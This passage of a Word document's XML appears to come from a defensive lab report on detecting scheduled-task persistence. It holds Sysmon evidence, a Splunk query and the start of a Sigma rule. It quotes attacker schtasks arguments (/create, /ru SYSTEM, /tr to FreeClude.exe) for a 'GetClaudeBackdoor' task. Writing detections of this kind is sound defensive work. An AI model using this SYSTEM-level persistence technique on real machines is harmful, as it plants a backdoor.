        <w:t>This activity maps to T1053.005 — Scheduled Task/Job: Scheduled Task. Because the operator already had an elevated execution context, this event is treated as persistence and execution, rather than evidence of a privilege-escalation exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31219865">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pP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3"/>
        <w:gridCol w:w="3383"/>
        <w:gridCol w:w="3383"/>
      </w:tblGrid>
      <w:tr w14:paraId="7237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shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1097B59C">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p>
          <w:p w14:paraId="27C39BB3">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Action</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B5DD5B2">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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0AF89BA9">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ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4EF7ADA9">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Sysmon Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6F18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3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="491F9CE3">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Create scheduled task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59DA44F2">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T1053.005 — Scheduled Task/Job: Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="32EFBAAB">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Sysmon Event ID 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> for </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>schtasks.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>/create</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6B63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jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="43FD16C9">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Configure payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="446A15A8">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T1053.005 — Scheduled Task/Job: Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3383" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7EFB3A65">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Sysmon Event ID 1 showing </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="20"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
                <w:color w:val="1F2937"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>/tr C:\Users\saada\Downloads\FreeClude.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="43A41F7F">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="312AA946">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Splunk: scheduled task investigation</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="123" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10025"/>
      </w:tblGrid>
      <w:tr w14:paraId="1F6665B5">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10025" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="203A5B" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1F33"/>
          </w:tcPr>
          <w:p w14:paraId="3B744C17">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index=_internal host="Sh-Win10" EventCode=7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F00DD87">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search Image="*\\taskhostw.exe" ImageLoaded="*\\taskschd.dll"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66CA3EAB">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>| table _time host User Image ImageLoaded ProcessGuid ProcessId Signed SignatureStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7461906D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B1107E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Registry Value Set — Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10118"/>
      </w:tblGrid>
      <w:tr w14:paraId="4A890604">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="90" w:hRule="atLeast"/>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6C0D6422">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UtcTime: 2026-09-24 13:14:42.818</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EBFB32D">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1ED57BB9">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>RuleName: technique_id=T1053,technique_name=Scheduled Task</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C1B8752">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ProcessId: 10520</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E90C826">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="07C78229">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Image: C:\Windows\System32\taskhostw.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="192262FE">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ImageLoaded: C:\Windows\System32\taskschd.dll</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7945ACCA">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description: Task Scheduler COM API</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="258B9049">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3D39FA19">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Signed: true</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F86C283">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SignatureStatus: Valid</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57AF9BE3">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User: NT AUTHORITY\SYSTEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4099232E">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54F300E4">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C01F4E7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BD2909B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="499B5C61">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CCAF2F2">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CAF9516">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="604FAA9D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sigma 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Scheduled Task Creation With Elevated System Context (Mapped Phase: Phase 5B)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Severity: High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6608AB">
      <w:pPr>
        <w:pStyle w:val="3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This rule detects the use of the native Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>schtasks.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> utility to create a scheduled task configured to run under the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> account. In the lab, the attacker created the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GetClaudeBackdoor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> task using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/create</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and configured it with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/ru SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. The rule therefore focuses on the combination of scheduled task creation and an elevated SYSTEM execution context.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10118"/>
      </w:tblGrid>
      <w:tr w14:paraId="1A9AD9F2">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61B2A680">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>title: Scheduled Task Creation With Elevated System Context</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12CD9059">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>status: test</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="545EF9A4">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="750D1FCB">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
